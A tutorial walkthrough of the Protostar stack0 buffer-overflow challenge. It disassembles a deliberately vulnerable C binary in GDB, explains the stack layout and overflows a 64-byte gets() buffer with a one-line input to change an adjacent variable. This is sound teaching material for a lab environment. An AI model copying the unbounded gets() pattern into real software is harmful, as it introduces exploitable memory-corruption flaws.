Practical case: Buffer Overflow 0x01

This article was published on the 12th of September 2018. This article was updated on the 11th of May 2020, and on the 13th of September 2021.

Table of contents

The stack

The previous article explained the working of the stack and the way variables are stored on the stack. In this practical case, the stack0 challenge from Protostar will be analysed.
Protostar is a bootable ISO image with a Linux distribution (Debian), together with a set of challenges and certain tooling (e.g. Python and GDB). Most ‘modern’ safety measures have been disabled on the provided system, such as Address Space Layout Randomisation (ASLR) and Non-Executable (NX) memory.

The approach of this practical case differs from the original Protostar challenge, although the binary does not differ from the original challenge. The Protostar challenges provide the source code and the compiled binaries, after which the user has find and exploit the weakness in each binary to complete the challenges. Using this open approach, the user can compare the source code (the binaries are written in C) and the assembly.

In this article, the analysis will be conducted without the source code. At the end of this case, a copy of the source code is embedded to use as a comparison after the whole analysis has been completed. This way, the goal of this chapter (assembly basics) is highlighted and this approach provides a better insight in the fundamental conccepts that are behind the exploit. Additionally, it is good to know that the provided source code can be compiled as-is, but that the provided solution will not work due to security measures in modern operating systems and compilers. It is therefore required to use the provided Debian ISO.

Setting up the environment

After booting the ISO in a virtual machine using the provided live boot option, one can log in with the credentials user for both the username and the password. Then, one can use the command bash to use the ‘born again shell’ instead of the default shell. Using the command ip addr, the IP address of the machine can be found. Open a terminal (or PuTTY on Windows) and use SSH to connect to the machine, where [ip] equals the IP of the virtual machine:

ssh user@[ip]

The password remains user, since you now connect onto the virtual machine from the host, instead of connecting locally. Connecting via SSH enables you to easily copy and paste data from and to the terminal, because the host’s clipboard can be used. Note that it is not required since the shared clipboard can be enabled or the user can type the commands manually instead of copying them.

Finding the binary

The binary can be found in the /opt/protostar/bin directory. Using the file program in bash, more details can be obtained:

user@protostar:/opt/protostar/bin$ file ./stack0
./stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This provides more insight, firstly it is a 32-bit ELF executable which is not stripped. A stripped binary, which is the default during this course, does not contain debugging symbols. These symbols, such as function names, save time analysing a function to know its purpose. Additionally, this binary is allowed to set the user id. The root user has an ID of 0. Using setuid, the program can elevate its privilege and execute commands as root. This wont be of any importance in this challenge, but it does illustrate how much information the file command provides.

Executing the binary

Upon executing the program, it awaits input from the user and then prints a message:

user@protostar:/opt/protostar/bin$ ./stack0
[InputMessage]
Try again?

Note that the [InputMessage] is the place where it awaits the input before the execution continues.

GDB comes preinstalled on this system and will be the disassembler during this case. To open a file in GDB, simply provide the location of the file as the parameter in GDB:

cd /opt/protostar/bin
gdb ./stack0

To list all functions, use the info functions command. Note that gdb also has autocompletion upon pressing tab. The function naming scheme differs from the scheme in Radare2:

(gdb) info functions
All defined functions:

File stack0/stack0.c
int main(int, char**);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini

The function puts writes the provided string to the standard output, together with a trailing newline character. It is therefore logical to see the puts in the list of functions, since the Try again? string was printed during the execution of the program. Using printf in C can result in the usage of puts instead, depending on the decision of the compiler.

Another function which is worth looking at, is the gets function. Using the manuals that are present in most Linux and MacOS distributions (or search for it online if you have no access to those, or are on a different platform), more information can be found regarding the usage and workings of this function. To open the manual page, use the man gets command in the terminal.

FGETS(3)                 BSD Library Functions Manual                 FGETS(3)

NAME
     fgets, gets -- get a line from a stream

LIBRARY
     Standard C Library (libc, -lc)

SYNOPSIS
     #include 

     char *
     fgets(char * restrict str, int size, FILE * restrict stream);

     char *
     gets(char *str);

DESCRIPTION
     The fgets() function reads at most one less than the number of characters
     specified by size from the given stream and stores them in the string
     str.  Reading stops when a newline character is found, at end-of-file or
     error.  The newline, if any, is retained.  If any characters are read and
     there is no error, a `\0' character is appended to end the string.

     The gets() function is equivalent to fgets() with an infinite size and a
     stream of stdin, except that the newline character (if any) is not stored
     in the string.  It is the caller's responsibility to ensure that the
     input line, if any, is sufficiently short to fit in the string.

RETURN VALUES
     Upon successful completion, fgets() and gets() return a pointer to the
     string.  If end-of-file occurs before any characters are read, they
     return NULL and the buffer contents remain unchanged.  If an error
     occurs, they return NULL and the buffer contents are indeterminate.  The
     fgets() and gets() functions do not distinguish between end-of-file and
     error, and callers must use feof(3) and ferror(3) to determine which
     occurred.

ERRORS
     [EBADF]            The given stream is not a readable stream.

     The function fgets() may also fail and set errno for any of the errors
     specified for the routines fflush(3), fstat(2), read(2), or malloc(3).

     The function gets() may also fail and set errno for any of the errors
     specified for the routine getchar(3).

SECURITY CONSIDERATIONS
     The gets() function cannot be used securely.  Because of its lack of
     bounds checking, and the inability for the calling program to reliably
     determine the length of the next incoming line, the use of this function
     enables malicious users to arbitrarily change a running program's func-
     tionality through a buffer overflow attack.  It is strongly suggested
     that the fgets() function be used in all cases.  (See the FSA.)

SEE ALSO
     feof(3), ferror(3), fgetln(3), fgetws(3), getline(3)

STANDARDS
     The functions fgets() and gets() conform to ISO/IEC 9899:1999
     (``ISO C99'').

BSD                              June 4, 1993                              BSD

Other than the description, return value and the possible errors, this manual page provides us with a key piece of information for this challenge: the security considerations. The size of the input can be bigger than the buffer in which it is stored, resulting in an overflow. This overflow occurs in the buffer, which can be stored on the heap or the stack. Therefore, additional memory locations can be overwritten.

To disassemble a function in GDB, use the disassemble command, followed by the name of the function, in this case main: disassemble main:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   %ebp
0x080483f5 <main+1>:	mov    %esp,%ebp
0x080483f7 <main+3>:	and    $0xfffffff0,%esp
0x080483fa <main+6>:	sub    $0x60,%esp
0x080483fd <main+9>:	movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:	lea    0x1c(%esp),%eax
0x08048409 <main+21>:	mov    %eax,(%esp)
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    0x5c(%esp),%eax
0x08048415 <main+33>:	test   %eax,%eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	movl   $0x8048500,(%esp)
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	movl   $0x8048529,(%esp)
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.

Notice how to syntax of the assembly language differs from the one that has been used in this guide so far. This is the AT&T syntax, which is a different way of writing assembly, though it is essentially the same as the Intel syntax. To view the output in the Intel syntax, one needs to switch the disassembly-flavor in GDB to intel with the command: set disassembly-flavor intel. Then, run the disassemble main command again, which should provide the following output:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.

In the first few instructions, the stack frame is set up, the stack is aligned and the stack is set up for the storage of local variables:

0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60

The subtraction of 0x60 is exactly what the program needs for the whole stack frame, but not necessarily the size of the variables in the main function. Subtracting more at once saves additional instructions later, thus optimising the code.

Then, the value of 0x0 (zero) is saved at ESP+0x5c:

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

This indicates that it is a variable, who’s value is set to 0. Since the memory is already allocated on the stack with the optimised sub esp,0x60 instruction, the move function saves the variable on the stack at the provided address.

Afterwards, the address of the second variable is loaded with the lea (load effective address) instruction:

0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax

The lea instruction adds the addresses that are provided in the second parameter in the first parameter without altering the second parameter. To illustrate this, assume that ESP equals 0x01, then the value in EAX would be 0x01+0x1c = 0x1d whilst ESP remains 0x01.

So the outcome of ESP+0x1c is saved in EAX after which the stored value within ESP (at its current address) is set to the value of EAX. This functions nearly the same as pushing EAX on the stack with the push EAX instruction. The reason not to use this, but rather the mov instruction, is compiler optimisation. The allocation of the memory for the stack frame was done at once, meaning that additional allocation of 4 bytes on the stack (which are allocated when the push instruction is executed), needlessly use memory. It is therefore more efficient to use the already set stack pointer and save the result in the already allocated space.

The size of the second variable equals the address of the first variable minus the address of the second variable, in which ESP can be neglected, as it appears in both addresses: 0x5c – 0x1c = 0x40 bytes, which equals 64 bytes in decimal notation.

Then the gets function is called:

0x0804840c <main+24>:	call   0x804830c <gets@plt>

The gets function uses the parameter it receives via the stack, to write the obtained input to, which is done with the previously mentioned lea instruction at main+17. When the input of the user is received, the gets function returns a pointer to the provided buffer. In the case of an error, NULL is returned. The return value is stored in EAX:

0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]

The EAX register is then compared using the test instruction’:

0x08048415 <main+33>:	test   eax,eax

Test performs a bit-wise logical AND operation and sets (amongst others) the Zero Flag (ZF) to 1 if the result of the AND operation is 0. If the result is not 0, the Zero Flag is set to 0, meaning it is not set.

A logical bite-wise AND operation on 0 and 0 always equals 0, which sets the Zero Flag. Since EAX is compared with itself and the assigned value is 0, the flag will always be set. The next instruction is a conditional jump: if the Zero Flag has been set, the jump is taken.

0x08048417 <main+35>:	je     0x8048427 <main+51>

Upon taking the jump, the following instructions remain before the end of the main function is reached:

0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

The puts function requires a string as a parameter, which is why one can deduce that the mov instruction saves a string on the stack before the call to the puts function is made. To know what string is provided to the puts function, one can use x/s [address] in GDB. The x stands for eXamine and the s requests the examined data in the form of a string. Logically, the provided address is the location which is examined. The string at 0x8048529 equals:

(gdb) x/s 0x8048529
0x8048529:	 "Try again?"

This is the output that is printed after the user input. If the jump is not taken, the main function ends differently:

0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
[...]
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

Note that the […] instructions are skipped due to the unconditional jump and are therefore not executed.

Upon examining the string located at 0x8048500, the result is:

(gdb) x/s 0x8048500
0x8048500:	 "you have changed the 'modified' variable"

So the first variable (the one that was set to zero in the beginning) is apparently named modified and should be changed to something other than its default value (which equals 0). If the value is not equal to 0, the logical bite-wise AND operation will not set the Zero Flag and the jump will not be taken.

Summary and approach

The modified integer, which equals 0 by default, should be altered to something other than 0. The stack is filled with a buffer of 64 bytes before the modified integer is located on the stack, since it was allocated before the buffer was allocated (remember that the stack grows downwards). The start of the user input begins at the buffer of 64 bytes. The buffer is filled via a function that has no boundary checks.

From this short summary, the following approach can be deduced: provide an input bigger than the 64 byte buffer that is given to the gets function. This will also overflow into the modified variable, since it is next on the stack. Providing too much characters as an input would result in a segmentation fault, as the return addresses in the stack frame would get altered to invalid locations.

The input to overflow the buffer can be done manually with an input of 65 (66, 67 or 68) characters when the program asks for input:

user@protostar:/opt/protostar/bin$ ./stack0
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
you have changed the 'modified' variable 

Note that more characters are allowed due to the additional space that is left on the stack, but the characters 65 through 68 are the exact location of the modified variable on the stack. Providing more than 79 characters still provides the message that the modified has been changed, whilst also causing a segmentation fault.

Additionally, this can be done with Python, since it is more efficient and less prone to errors:

user@protostar:/opt/protostar/bin$ python -c 'print "a"*65' | ./stack0
you have changed the 'modified' variable

Source code

The source code of the challenge, as provided by Protostar:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
 
int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
 
  modified = 0;
  gets(buffer);
 
  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The next article regarding the “Crash course” can be found here!.


To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], or DM me on Twitter @Libranalysis.